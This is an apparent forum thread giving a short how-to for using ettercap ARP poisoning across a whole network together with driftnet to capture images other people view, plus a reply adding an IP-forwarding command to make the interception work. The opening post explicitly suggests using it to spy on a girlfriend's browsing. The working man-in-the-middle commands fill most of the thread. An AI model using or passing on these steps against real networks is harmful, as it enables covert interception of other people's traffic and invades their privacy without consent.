Thread: How to use driftnet properly.

How to use driftnet properly.

Hi,

I see many questions about driftnet that it doesn't show pictures from other PC's but are able to see their own. So I decided to post a small instruction about how to do it.
    We have 2 options.
    Option one is to see the whole network and option 2 is to specify an IP. I assume you'd love to do the whole network and check what your Girlfriend is watching :-)

All you need to do is to open 2 terminals. I'm using wlan0 as my wireless network.
    Terminal 1 type the following to start ettercap.

ettercap -Tqi wlan1 -M arp:remote // //

Then start terminal 2 and start driftnet.
    driftnet -i wlan0

That's it. This will definiteley work.

Peace.

Quote Originally Posted by Attilafx View Post
    Hi,

I see many questions about driftnet that it doesn't show pictures from other PC's but are able to see their own. So I decided to post a small instruction about how to do it.
    We have 2 options.
    Option one is to see the whole network and option 2 is to specify an IP. I assume you'd love to do the whole network and check what your Girlfriend is watching :-)

All you need to do is to open 2 terminals. I'm using wlan0 as my wireless network.
    Terminal 1 type the following to start ettercap.

ettercap -Tqi wlan1 -M arp:remote // //

Then start terminal 2 and start driftnet.
    driftnet -i wlan0

That's it. This will definiteley work.

Peace.

Thanks so much for this.... I am new to Linux, and I have been trying these recently by doing everything separately (following other turorials where you specify device IP address, etc).

This worked great. Since no IP addresses were specified, I'm assumming that ettercap scans the network and automatically assigns the proper host and targets?

Thanks,

Matt!

Exactly, the // // is the whole network of your interface that is connected. So if anybody connects to the network, it will add them. You should see that in your ARP window.

Hi,

I need some help, I'm trying to test a MITM attack in my own home network.

I've different devices (notebook, smartphones,...) connected via wireless to my router and one PC connected via ethernet to the same router.

In a Terminall of my notebook where is installed Kali Linux 1.0.6 I've type:

ettercap -Tqi wlan0 -M arp:remote // //

Then I've started terminal 2 and I've started driftnet.
    driftnet -i wlan0

Then using the PC connected by ethernet I've opened a Chrome Borwser and searched some image in Google Images but in the notebook I can't see anything...(I can see something only if I search images in the notebook browser)

What am I doing wrong? Please help, Thx

There's one step that you might have missed:

echo "1">/proc/sys/net/ipv4/ip_forward

Then check this after you run ettercap. If the ip_forward isn't on, you can't get anything (at least, it didn't work for me until I did this).

Thanks for the help; I've been trying driftnet for years without success.